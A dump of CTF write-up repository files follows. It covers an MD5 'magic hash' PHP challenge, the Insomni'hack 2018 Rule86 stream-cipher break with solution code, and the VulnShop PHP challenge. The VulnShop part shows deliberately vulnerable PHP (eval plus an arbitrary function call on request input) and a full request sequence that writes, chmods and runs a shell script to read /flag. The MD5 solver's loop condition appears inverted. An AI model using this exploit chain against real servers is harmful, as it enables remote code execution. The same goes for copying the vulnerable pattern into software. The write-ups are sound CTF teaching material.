10 |         echo "Nah... '",htmlspecialchars($md5),"' not the same as ",md5($md5);
11 | }
12 | 
13 | 
14 | ?>
15 | <p>Find a string that has a MD5 digest equal to itself!</p>
16 | <form>
17 |     <label>Answer: </label>
18 |     <input type='text' name='md5' />
19 |     <input type='submit' />
20 | </form>
21 | 
22 | <a href='?src'>Source Code</a>


--------------------------------------------------------------------------------
/2017/HackDatKiwi/MD5 Games 1/sol.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | echo "running script";
 3 | 
 4 |  $base = "0e";
 5 |  $result = "";
 6 |  $curr_number = 0; 
 7 |  do {
 8 |   $curr = $base . "$curr_number";
 9 |   $result = md5($curr);
10 |   $curr_number += 1;
11 |   }
12 |  while ($curr == $result);
13 | 
14 | echo "\n";
15 | echo $curr;
16 | echo "\n";
17 | echo $result;
18 | echo "\n";
19 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/README.md:
--------------------------------------------------------------------------------
  1 | ![description](images/description.png)
  2 | 
  3 | # Getting Started:
  4 | 
  5 | We're given a link to an archive containing 4 files: 
  6 | 
  7 | * hint.gif.enc
  8 | * rule86.txt
  9 | * rule86.txt.enc
 10 | * super_cipher.py.enc
 11 | 
 12 | Each of these files is included in this the `sample_files` folder in this repo: [Link](./sample_files/)
 13 | 
 14 | The only readable file is rule86.txt, but it just contains nonsense.
 15 | 
 16 | As stated in the challenge description, the provided `*.enc` files were encrypted with a synchronous stream cipher.
 17 | 
 18 | 
 19 | # Stream Ciphers
 20 | 
 21 | In a synchronous stream cipher, a key stream is generated with a pseudorandom number generator, and the generated stream of bytes is xored with the message to get the ciphertext. 
 22 | 
 23 | In this scheme, the PRNG is parameterized by a secret key.
 24 | 
 25 | Since we know that `ciphertext = keystream ^ message`, and we know a `ciphertext` and `message` pair (`rule86.txt` and `rule86.txt.enc`), we can calculate part of the keystream by calculating `keystream = ciphertext ^ message`.
 26 | 
 27 | One we know part of the keystream, we can decrypt other ciphertexts by just xoring them with the keystream.
 28 | 
 29 | # Partial decryption
 30 | 
 31 | At this point, we can only decrypt as many bytes of a ciphertext as we have bytes of the keystream (aka the size of `rule86.txt`). Because of this, we can't fully decrypt any of the other files, as they're all too large.
 32 | 
 33 | As a start, we decrypted the `super_cipher.py.enc` file to see some of the code that was used for the cipher.
 34 | 
 35 | Here is the partially decrypted code:
 36 | ```python
 37 | #!/usr/bin/env python3
 38 | 
 39 | import argparse
 40 | import sys
 41 | 
 42 | parser = argparse.ArgumentParser()
 43 | parser.add_argument("key")
 44 | args = parser.parse_args()
 45 | 
 46 | RULE = [86 >> i & 1 for i in range(8)]
 47 | N_BYTES = 32
 48 | N = 8 * N_BYTES
 49 | 
 50 | def next(x):
 51 |   x = (x & 1) << N+1 | x << 1 | x >> N-1
 52 |   y = 0
 53 |   for i in range(N):
 54 |     y |= RULE[(x >> i) & 7] << i
 55 |   return y
 56 | 
 57 | # Bootstrap the PNRG
 58 | keystream = int.from_bytes(args.key.encode(),'little')
 59 | for i in range(N//2):
 60 |   keystream = next(keystream)
 61 | 
 62 | # Encrypt / decrypt stdin to stdout
 63 | plainte
 64 | ```
 65 | 
 66 | From this code, we know how how the keystream is generated (just repeatedly calling `next` on the previous keystream block), and can thus generate a keystream of whatever length we want using the partial keystream that we recovered:
 67 | 
 68 | ```python
 69 | 
 70 | #read the sample data given to us
 71 | txt = open("./sample_files/rule86.txt", "rb").read()
 72 | enc = open("./sample_files/rule86.txt.enc", "rb").read()
 73 | hint = open("./sample_files/hint.gif.enc", "rb").read()
 74 | py_file = open("./sample_files/super_cipher.py.enc", "rb").read()
 75 | 
 76 | #xors two byte arrays
 77 | def xor(bytes1, bytes2):
 78 |     return bytearray([(a ^ b) for (a, b) in zip(bytes1, bytes2)])
 79 | 
 80 | #gets the first N_BYTES of the keystream that was used to encrypt rule86.txt.enc
 81 | def get_base_keystream():
 82 |     return xor(txt, enc)[0:N_BYTES]
 83 | 
 84 | #gets the base keystream that was used, and generates the whole `length` byte keystream that can be used to decrypt
 85 | def generate_stream(length):
 86 |     keystream = get_base_keystream()
 87 |     curr_int = int.from_bytes(keystream, 'little')
 88 |     for i in range(ceil(length/N_BYTES) - 1):
 89 |         curr_int = next(curr_int)
 90 |         keystream += curr_int.to_bytes(N_BYTES, 'little')
 91 |     return keystream
 92 | 
 93 | #decrypts an array of bytes
 94 | def decrypt(input_bytes):
 95 |     length = len(input_bytes)
 96 |     keystream = generate_stream(length)
 97 |     return xor(input_bytes, keystream)
 98 | 
 99 | ```
100 | 
101 | Using this, we were able to fully decrypt each of the encrypted files.
102 | 
103 | # Now we're done right?
104 | 
105 | At this point, we looked at the decrypted files, and were disappointed to find that the `hint.gif` did not contain the flag (and super_cipher.py didn't contain any more useful info):
106 | 
107 | ![decrypted hint](images/hint.gif)
108 | 
109 | From the hint, we could see that the key that was input to bootstrap the "prg" is a flag for the challenge, and so we need to reverse the prg, and walk our way back through the keystream to get what the input key was.
110 | 
111 | # Reversing the "prg"
112 | 
113 | From the decrypted code, we could see that the `next` function does the following:
114 | 
115 | * Takes in a 256 bit input x
116 | * Computes a 257 bit x' such that the first bit of x' is the 256th bit of x, the 257th bit of x' is the 1st bit of x and the remaining 255 bits of x' are x' left shifted by 1.
117 | * Computes a value y, where each bit of y is determined by looking up 3 bits of x' in a table of 0's and 1's.
118 | 
119 | So in order to reverse this, we did the following:
120 | * For the first bit of a 256 bit input y, determine what possible 3-bit codes of x' could have resulted in that bit of y and store them as possible decodings of y.
121 | * Walk through y one bit at a time, and update the potential values of x' that could have resulted in what we've seen so far in y.
122 | * At the end, look at all of our possibilities for x' and check that they match the following conditions:
123 | 	* The 257th bit of x' == the 2nd to last bit of x' (both were set to be the first bit of x in `next`)
124 | 	* The 256th bit of x' == the last bit of x' (both were set to be the 256th bit of x in `next`)
125 | * After recovering the 1 valid possibility for x', undo the bit shifts that were done in `next` to recover the original x.
126 | 
127 | Here's the code that was written to solve this:
128 | ```python
129 | #given in super_cipher.py
130 | RULE = [(86 >> i) & 1 for i in range(8)]
131 | N_BYTES = 32
132 | N = 8 * N_BYTES
133 | 
134 | # in y = next(x), each 3 bits of x determines 1 bit of y
135 | # use this dictionary to store this relation for reversing this function
136 | dct = {
137 |     #y      x
138 |     "0" : ["000", "011", "101", "111"],
139 |     "1" : ["001", "010", "100", "110"]
140 | }
141 | 
142 | #takes in an int value of keystream, reverses the "prg" to get the value that came before it
143 | def prev(y):
144 |     #turn to bit string of 256 bits
145 |     y = "{0:b}".format(y)
146 |     y = y.zfill(N)
147 | 
148 |     #the last bit can be decoded as any of the 4 values of x that could have set that bit
149 |     possibilities = dct[y[-1]]
150 |     #loop in reverse to get all possible values of x that could have created this y
151 |     for bit in reversed(y[:-1]):
152 |         new_possibilities = []
153 |         candidates = dct[bit]
154 |         for candidate in candidates:
155 |             for possibility in possibilities:
156 |                 #if the last 2 bits of the candidate match the first two bits of an existing possibility,
157 |                 #we can just append the first bit of the candidate to the possibility
158 |                 if candidate[1:] == possibility[:2]:
159 |                     new_possibilities += [candidate[0] + possibility]
160 |         possibilities = new_possibilities
161 | 
162 |     #Do some more checks to see which possibilities are actually valid
163 |     real = []
164 |     for possibility in possibilities:
165 |         #the `next` function takes an input x, and turns it into x' such that the last bit of x' = the first bit of x, and the first bit of x' = the last bit of x
166 |         #so check that the values of possibility are valid x' values in this way.
167 |         if possibility[0] == possibility[-2]:
168 |             if possibility[1] == possibility[-1]:
169 |                 real += [possibility]
170 |     if len(real) != 1:
171 |         print("there was an issue :(")
172 |         print(len(real))
173 |         sys.exit();
174 | 
175 |     #convert back to an int
176 |     x = int(real[0], 2)
177 | 
178 |     #reverse the bit operations done in `next` 
179 |     #(move the first bit to be the N'th bit, shift the rest of the value to the right by 1)
180 |     x = ((x >> 1) & ((2**N) - 1)) | ((x & 1) << (N - 1))
181 |     return x
182 | 
183 | ```
184 | 
185 | Once we could reverse the `next` function, we took the first keystream block used to encrypt, and reversed the bootstrapping loop to get back the original key:
186 | 
187 | ```python
188 | #we can get part of the key stream by just Xoring together a plaintext and a ciphertext
189 | # C = (M ^ K), so C ^ M = K, which lets us recover the keystream.
190 | partial_keystream = xor(txt, enc)
191 | 
192 | #the first value of `keystream` used to encrypt the ciphertexts we've been given (the first 256 bits of the partial keystream)
193 | base_key = int.from_bytes(partial_keystream[0:N_BYTES], 'little')
194 | 
195 | #use prev to reverse the key stream generation to get the original key
196 | curr = base_key
197 | for i in range(N//2):
198 |     curr = prev(curr)
199 | print(curr.to_bytes(N_BYTES, 'little'))
200 | 
201 | ```
202 | 
203 | And this outputs the key/flag:
204 | ![description](images/flag.png)
205 | 
206 | `INS{Rule86_is_W0lfr4m_Cha0s}`
207 | 
208 | The full solution code can be found here: [Link](./sol.py)
209 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/images/description.png


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/images/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/images/flag.png


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/images/hint.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/images/hint.gif


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/outputs/hint.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/outputs/hint.gif


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/outputs/hint_partial.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/outputs/hint_partial.gif


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/outputs/rule86.txt:
--------------------------------------------------------------------------------
 1 | What is Rule 86?
 2 | 
 3 | Rule 86 DOES NOT state that:
 4 | - any and all buttons, valves, switches, latches, or anything else may be pushed or turned more than once until one is certain that all buttons, valves, switches, latches, etc, has been pushed at least once each
 5 | - every time someone speaks your name, it creates a duplicate of you
 6 | - if one divides 86 by the sugar content of sap, you can estimate the amount of sap required to produce a gallon of syrup
 7 | - sharing a kiss is forbidden
 8 | 
 9 | Rule 86 is... something else.
10 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/outputs/rule86_partial.txt:
--------------------------------------------------------------------------------
 1 | What is Rule 86?
 2 | 
 3 | Rule 86 DOES NOT state that:
 4 | - any and all buttons, valves, switches, latches, or anything else may be pushed or turned more than once until one is certain that all buttons, valves, switches, latches, etc, has been pushed at least once each
 5 | - every time someone speaks your name, it creates a duplicate of you
 6 | - if one divides 86 by the sugar content of sap, you can estimate the amount of sap required to produce a gallon of syrup
 7 | - sharing a kiss is forbidden
 8 | 
 9 | Rule 86 is... something else.
10 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/outputs/super_cipher.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import argparse
 4 | import sys
 5 | 
 6 | parser = argparse.ArgumentParser()
 7 | parser.add_argument("key")
 8 | args = parser.parse_args()
 9 | 
10 | RULE = [86 >> i & 1 for i in range(8)]
11 | N_BYTES = 32
12 | N = 8 * N_BYTES
13 | 
14 | def next(x):
15 |   x = (x & 1) << N+1 | x << 1 | x >> N-1
16 |   y = 0
17 |   for i in range(N):
18 |     y |= RULE[(x >> i) & 7] << i
19 |   return y
20 | 
21 | # Bootstrap the PNRG
22 | keystream = int.from_bytes(args.key.encode(),'little')
23 | for i in range(N//2):
24 |   keystream = next(keystream)
25 | 
26 | # Encrypt / decrypt stdin to stdout
27 | plaintext = sys.stdin.buffer.read(N_BYTES)
28 | while plaintext:
29 |   sys.stdout.buffer.write((
30 |     int.from_bytes(plaintext,'little') ^ keystream
31 |   ).to_bytes(N_BYTES,'little'))
32 |   keystream = next(keystream)
33 |   plaintext = sys.stdin.buffer.read(N_BYTES)
34 |   


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/outputs/super_cipher_partial.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import argparse
 4 | import sys
 5 | 
 6 | parser = argparse.ArgumentParser()
 7 | parser.add_argument("key")
 8 | args = parser.parse_args()
 9 | 
10 | RULE = [86 >> i & 1 for i in range(8)]
11 | N_BYTES = 32
12 | N = 8 * N_BYTES
13 | 
14 | def next(x):
15 |   x = (x & 1) << N+1 | x << 1 | x >> N-1
16 |   y = 0
17 |   for i in range(N):
18 |     y |= RULE[(x >> i) & 7] << i
19 |   return y
20 | 
21 | # Bootstrap the PNRG
22 | keystream = int.from_bytes(args.key.encode(),'little')
23 | for i in range(N//2):
24 |   keystream = next(keystream)
25 | 
26 | # Encrypt / decrypt stdin to stdout
27 | plainte


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/sample_files/hint.gif.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/sample_files/hint.gif.enc


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/sample_files/rule86.txt:
--------------------------------------------------------------------------------
 1 | What is Rule 86?
 2 | 
 3 | Rule 86 DOES NOT state that:
 4 | - any and all buttons, valves, switches, latches, or anything else may be pushed or turned more than once until one is certain that all buttons, valves, switches, latches, etc, has been pushed at least once each
 5 | - every time someone speaks your name, it creates a duplicate of you
 6 | - if one divides 86 by the sugar content of sap, you can estimate the amount of sap required to produce a gallon of syrup
 7 | - sharing a kiss is forbidden
 8 | 
 9 | Rule 86 is... something else.
10 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/sample_files/rule86.txt.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/sample_files/rule86.txt.enc


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/sample_files/super_cipher.py.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/Rule86/sample_files/super_cipher.py.enc


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/Rule86/sol.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | from math import ceil
  4 | import sys
  5 | 
  6 | #given in super_cipher.py
  7 | #(after partially decrypting it)
  8 | def next(x):
  9 |     x = (x & 1) << N+1 | x << 1 | x >> N-1
 10 |     y = 0
 11 |     for i in range(N):
 12 |         y |= RULE[(x >> i) & 7] << i
 13 |     return y
 14 | 
 15 | #xors two byte arrays
 16 | def xor(bytes1, bytes2):
 17 |     return bytearray([(a ^ b) for (a, b) in zip(bytes1, bytes2)])
 18 | 
 19 | #decrypts as much as can be decrypted with the given key
 20 | def decrypt_some(key, input_bytes):
 21 |     return xor(key, input_bytes)
 22 | 
 23 | #gets the first N_BYTES of the keystream that was used
 24 | def get_base_keystream():
 25 |     return xor(txt, enc)[0:N_BYTES]
 26 | 
 27 | #gets the base keystream that was used, and generates the whole `length` byte keystream that can be used to decrypt
 28 | def generate_stream(length):
 29 |     keystream = get_base_keystream()
 30 |     curr_int = int.from_bytes(keystream, 'little')
 31 |     for i in range(ceil(length/N_BYTES) - 1):
 32 |         curr_int = next(curr_int)
 33 |         keystream += curr_int.to_bytes(N_BYTES, 'little')
 34 | 
 35 |     return keystream
 36 | 
 37 | #decrypts an array of bytes
 38 | def decrypt(input_bytes):
 39 |     length = len(input_bytes)
 40 |     keystream = generate_stream(length)
 41 |     return xor(input_bytes, keystream)
 42 | 
 43 | #takes in an int value of keystream, reverses the "prg" to get the value that came before it
 44 | def prev(y):
 45 |     #turn to bit string of 256 bits
 46 |     y = "{0:b}".format(y)
 47 |     y = y.zfill(N)
 48 | 
 49 |     #the last bit can be decoded as any of the 4 values of x that could have set that bit
 50 |     possibilities = dct[y[-1]]
 51 |     #loop in reverse to get all possible values of x that could have created this y
 52 |     for bit in reversed(y[:-1]):
 53 |         new_possibilities = []
 54 |         candidates = dct[bit]
 55 |         for candidate in candidates:
 56 |             for possibility in possibilities:
 57 |                 #if the last 2 bits of the candidate match the first two bits of an existing possibility,
 58 |                 #we can just append the first bit of the candidate to the possibility
 59 |                 if candidate[1:] == possibility[:2]:
 60 |                     new_possibilities += [candidate[0] + possibility]
 61 |         possibilities = new_possibilities
 62 | 
 63 |     #Do some more checks to see which possibilities are actually valid
 64 |     real = []
 65 |     for possibility in possibilities:
 66 |         #the `next` function takes an input x, and turns it into x' such that the last bit of x' = the first bit of x, and the first bit of x' = the last bit of x
 67 |         #so check that the values of possibility are valid x' values in this way.
 68 |         if possibility[0] == possibility[-2]:
 69 |             if possibility[1] == possibility[-1]:
 70 |                 real += [possibility]
 71 |     if len(real) != 1:
 72 |         print("there was an issue :(")
 73 |         print(len(real))
 74 |         sys.exit();
 75 | 
 76 |     #convert back to an int
 77 |     x = int(real[0], 2)
 78 | 
 79 |     #reverse the bit operations done in `next` 
 80 |     #(move the first bit to be the N'th bit, shift the rest of the value to the right by 1)
 81 |     x = ((x >> 1) & ((2**N) - 1)) | ((x & 1) << (N - 1))
 82 |     return x
 83 | 
 84 | #read the sample data given to us
 85 | txt = open("./sample_files/rule86.txt", "rb").read()
 86 | enc = open("./sample_files/rule86.txt.enc", "rb").read()
 87 | hint = open("./sample_files/hint.gif.enc", "rb").read()
 88 | py_file = open("./sample_files/super_cipher.py.enc", "rb").read()
 89 | 
 90 | #given in super_cipher.py
 91 | RULE = [(86 >> i) & 1 for i in range(8)]
 92 | N_BYTES = 32
 93 | N = 8 * N_BYTES
 94 | 
 95 | # in y = next(x), each 3 bits of x determines 1 bit of y
 96 | # use this dictionary to store this relation for reversing this function
 97 | dct = {
 98 |     #y      x
 99 |     "0" : ["000", "011", "101", "111"],
100 |     "1" : ["001", "010", "100", "110"]
101 | }
102 | 
103 | #we can get part of the key stream by just Xoring together a plaintext and a ciphertext
104 | # C = (M ^ K), so C ^ M = K, which lets us recover the keystream.
105 | partial_keystream = xor(txt, enc)
106 | 
107 | #use the partial key stream to get some partial outputs (lets us read most of the code file)
108 | open("./outputs/hint_partial.gif", "wb").write(decrypt_some(partial_keystream, hint))
109 | open("./outputs/super_cipher_partial.py", "wb").write(decrypt_some(partial_keystream, py_file))
110 | open("./outputs/rule86_partial.txt", "wb").write(decrypt_some(partial_keystream, enc))
111 | 
112 | #generate the remainder of the keystream to decrypt full files
113 | open("./outputs/super_cipher.py", "wb").write(decrypt(py_file))
114 | open("./outputs/hint.gif", "wb").write(decrypt(hint))
115 | open("./outputs/rule86.txt", "wb").write(decrypt(enc))
116 | 
117 | #At this point, we've decrypted the hint, which tells us to turn around, so we should try to reverse the "prg" to get the key that was input
118 | 
119 | #the first value of `keystream` used to encrypt the ciphertexts we've been given (the first 256 bits of the partial keystream)
120 | base_key = int.from_bytes(partial_keystream[0:N_BYTES], 'little')
121 | 
122 | #use prev to reverse the key stream generation to get the original key
123 | curr = base_key
124 | for i in range(N//2):
125 |     curr = prev(curr)
126 | print(curr.to_bytes(N_BYTES, 'little'))
127 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/README.md:
--------------------------------------------------------------------------------
  1 | ![description](images/description.png)
  2 | 
  3 | # Getting Started:
  4 | 
  5 | We're given a link to the VulnShop webpage, which contains links to the source code of the page, as well as php configuration details about the server.
  6 | 
  7 | ![index page](images/index.png)
  8 | 
  9 | Here is the given source code:
 10 | ```php
 11 | <?php if(isset($_GET['hl'])){ highlight_file(__FILE__); exit; } 
 12 |     error_reporting(0); session_start();  
 13 |     // Anti XSS filter 
 14 |     $_REQUEST = array_map("strip_tags", $_REQUEST); 
 15 |     // For later, when we will store infos about visitors. 
 16 |     chdir("tmp"); 
 17 | ?> 
 18 | <!DOCTYPE html> 
 19 | <html> 
 20 |     <head> 
 21 |         <title>Work in progress...</title> 
 22 |         <meta charset="utf-8" /> 
 23 |         <meta http-equiv="content-type" content="text/html; charset=utf-8" /> 
 24 |         <style> 
 25 |             body { 
 26 |                 background-color: #aaa; 
 27 |                 color:#fff; 
 28 |             } 
 29 |              
 30 |             .page { 
 31 |                 width: 50%; 
 32 |                 margin: 0 auto; 
 33 |                 margin-top: 75px; 
 34 |             } 
 35 |              
 36 |              
 37 |             .menu ul li { 
 38 |                 display:inline-block; 
 39 |                 vertical-align:top; 
 40 |                 margin-right: 30px; 
 41 |                  
 42 |             } 
 43 |         </style> 
 44 |     </head> 
 45 |     <body> 
 46 |         <div class="page"> 
 47 |             <div class="menu"> 
 48 |                 <ul> 
 49 |                     <li><a href="?page=default">Home</a></li> 
 50 |                     <li><a href="?page=introduction">Introduction</a></li> 
 51 |                     <li><a href="?page=privacy">Privacy</a></li> 
 52 |                     <li><a href="?page=contactus">Contact</a></li> 
 53 |                 </ul> 
 54 |             </div> 
 55 |              
 56 |             <div class="content"> 
 57 |                 <?php 
 58 |                         switch($_GET['page']) { 
 59 |                             case 'default': 
 60 |                             default: 
 61 |                                 echo "<p>Welcome to our website about infosec. It's still under construction, but you can begin to browse some pages!</p>"; 
 62 |                                 break; 
 63 |                             case 'introduction': 
 64 |                                 echo "<p>Our website will introduce some new vulnerabilities. Let's check it out later!</p>"; 
 65 |                                 break; 
 66 |                             case 'privacy': 
 67 |                                 echo "<p>This website is unbreakable, so don't worry when contacting us about some new vulnerabilities!</p>"; 
 68 |                                 break; 
 69 |                             case 'contactus': 
 70 |                                 echo "<p>You can't contact us for the moment, but it will be available later.</p>"; 
 71 |                                 $_SESSION['challenge'] = rand(100000,999999); 
 72 |                                 break; 
 73 |                             case 'captcha': 
 74 |                                 if(isset($_SESSION['challenge'])) echo $_SESSION['challenge']; 
 75 |                                 // Will make an image later 
 76 |                 touch($_SESSION['challenge']); 
 77 |                                 break; 
 78 |                             case 'captcha-verify': 
 79 |                 // verification functions take a file for later, when we'll provide more way of verification 
 80 |                                 function verifyFromString($file, $response) { 
 81 |                                     if($_SESSION['challenge'] === $response) return true; 
 82 |                                     else return false; 
 83 |                                 } 
 84 |                                  
 85 |                                 // Captcha from math op 
 86 |                                 function verifyFromMath($file, $response) { 
 87 |                                     if(eval("return ".$_SESSION['challenge']." ;") === $response) return true; 
 88 |                                     else return false; 
 89 |                                 } 
 90 |                                 if(isset($_REQUEST['answer']) && isset($_REQUEST['method']) && function_exists($_REQUEST['method'])){ 
 91 |                                     $_REQUEST['method']("./".$_SESSION['challenge'], $_REQUEST['answer']); 
 92 |                                 } 
 93 |                                 break; 
 94 | 
 95 |                         } 
 96 |                 ?> 
 97 |             </div> 
 98 |         </div> 
 99 |         <p><a href="/?hl">View code source of the file, to be sure we're secure!</a></p> 
100 |         <p><a href="/phpinfo.php">Show our configurations</a></p> 
101 |     </body> 
102 | </html> 
103 | ```
104 | 
105 | From this code, we see that the server will generate a new random number and set our `challenge` variable every time we navigate to `/contactus`. This challenge is also stored as a file, and is used in later requests to `/captcha` and `/captcha-verify`.
106 | 
107 | In the handler for `/captcha-verify`, there's a line that allows us to call arbitrary functions, with the random number filename as the first parameter, and our input as the second parameter.
108 | From this, it seems like a good way to solve the challenge would be to try to write some code to the file using this vulnerable function, use it again to execute the code that we wrote, and then use it again to read the output of our code.
109 | 
110 | # The Exploit:
111 | 
112 | Here is the script we will execute on the server (this appends the contents of `/flag` to the end of the currently running script):
113 | ```bash
114 | #!/bin/sh
115 | cat /flag >> "./${0##*/}";
116 | ```
117 | 
118 | We can only use functions that follow the format: `func(filename, input)`, where we can't control the filename (since it's randomly generated, and we can't edit it), but can control the input.
119 | 
120 | We also cannot use any of the functions listed in the `disable_functions` section of the server config (ie, most of the functions that would allow us to execute the code). Luckily, the server still allows us to use popen to execute files.
121 | 
122 | ![disabled functions](images/disabled.png)
123 | 
124 | ## Actual commands used:
125 | We write the script to the file with file_put_contents(filename, our_script).
126 | 
127 | We then use chmod(filename, "511") to make it executable. PHP casts our string input to a decimal integer, and decimal 511 = octal 0777, which gives read/write/execute permissions to everyone on the server.
128 | 
129 | We run the new file with popen(filename, "r")
130 | 
131 | We read the output with highlight_file(filename, "")
132 | 
133 | Here are the actual requests made to exploit the server:
134 | 
135 | ## Get a randomly generated challenge:
136 | `http://vulnshop.teaser.insomnihack.ch/?page=contactus`
137 | 
138 | ## Write the script to the file:
139 | `http://vulnshop.teaser.insomnihack.ch/?page=captcha-verify&method=file_put_contents&answer=%23!%2Fbin%2Fsh%0Acat%20%2Fflag%20%3E%3E%20%22.%2F%24%7B0%23%23*%2F%7D%22%3B`
140 | 
141 | ## Turn it executable:
142 | `http://vulnshop.teaser.insomnihack.ch/?page=captcha-verify&method=chmod&answer=511`
143 | 
144 | ## Run the script:
145 | `http://vulnshop.teaser.insomnihack.ch/?page=captcha-verify&method=popen&answer=r`
146 | 
147 | ## Read the output (which is now appended to the end of the script we wrote):
148 | `http://vulnshop.teaser.insomnihack.ch/?page=captcha-verify&method=highlight_file&answer=`
149 | 
150 | ![output of the exploit](images/output.png)
151 | 
152 | And now we get the flag: `INS{4rb1tr4ry_func_c4ll_is_n0t_s0_fun}`
153 | 
154 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/VulnShop/images/description.png


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/images/disabled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/VulnShop/images/disabled.png


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/images/index.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/VulnShop/images/index.png


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/images/output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2018/Insomni'hack teaser/VulnShop/images/output.png


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/source/vulnshop.teaser.insomnihack.ch/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | 	
 4 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:43 GMT -->
 5 | <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
 6 | <head>
 7 | 		<title>Work in progress...</title>
 8 | 		<meta charset="utf-8" />
 9 | 		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
10 | 		<style>
11 | 			body {
12 | 				background-color: #aaa;
13 | 				color:#fff;
14 | 			}
15 | 			
16 | 			.page {
17 | 				width: 50%;
18 | 				margin: 0 auto;
19 | 				margin-top: 75px;
20 | 			}
21 | 			
22 | 			
23 | 			.menu ul li {
24 | 				display:inline-block;
25 | 				vertical-align:top;
26 | 				margin-right: 30px;
27 | 				
28 | 			}
29 | 		</style>
30 | 	</head>
31 | 	<body>
32 | 		<div class="page">
33 | 			<div class="menu">
34 | 				<ul>
35 | 					<li><a href="index1380.html?page=default">Home</a></li>
36 | 					<li><a href="index32da.html?page=introduction">Introduction</a></li>
37 | 					<li><a href="index8a5f.html?page=privacy">Privacy</a></li>
38 | 					<li><a href="index84f6.html?page=contactus">Contact</a></li>
39 | 				</ul>
40 | 			</div>
41 | 			
42 |             <div class="content">
43 |                 <p>Welcome to our website about infosec. It's still under construction, but you can begin to browse some pages!</p>	        </div>
44 | 		</div>
45 | 		<p><a href="index2b4c.html?hl">View code source of the file, to be sure we're secure!</a></p>
46 | 		<p><a href="phpinfo.html">Show our configurations</a></p>
47 | 	</body>
48 | 
49 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:43 GMT -->
50 | </html>
51 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/source/vulnshop.teaser.insomnihack.ch/index1380.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | 	
 4 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=default by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:44 GMT -->
 5 | <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
 6 | <head>
 7 | 		<title>Work in progress...</title>
 8 | 		<meta charset="utf-8" />
